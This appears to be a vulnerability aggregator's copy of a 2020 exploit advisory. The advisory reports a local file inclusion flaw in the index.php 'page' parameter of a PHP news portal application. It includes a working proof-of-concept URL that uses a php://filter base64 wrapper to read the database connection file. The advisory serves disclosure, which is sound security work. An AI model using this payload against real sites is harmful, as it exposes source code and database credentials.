Lucene search
K

Online News Portal Local File Inclusion

🗓️ 17 Nov 2020 00:00:00Reported by gh1mauType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 585 Views

Online News Portal Local File Inclusion, Vulnerable to LFI Attac

Code
`# Exploit Title: Online News Portal - Local File Inclusion  
# Date: 2020-11-16  
# Exploit Author: gh1mau   
# Email: [email protected]  
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/  
# Vendor Homepage: https://www.sourcecodester.com/php/14600/online-news-portal-using-phpmysqli-source-code.html  
# Software Link: https://www.sourcecodester.com/download-code?nid=14600&title=Online+News+Portal+using+PHP%2FMySQLi+with+Source+Code  
# Software Release Data: November 16, 2020  
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)  
  
Vulnerable File:  
----------------   
/index.php  
  
Vulnerable Code:  
-----------------  
Entry point:  
line 26: $page = isset($_GET['page']) ? $_GET['page'] : 'home';  
  
Exit point:  
line 27: include $page.'.php';  
  
Vulnerable Issue:  
-----------------  
Attacker could load and read any file from the application (page= parameter from index.php) (with .php extension) and decode the base64 response to read the source code.  
  
POC:  
----  
http://localhost/news_portal/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Nov 2020 00:00Current
7.4High risk
Vulners AI Score7.4
585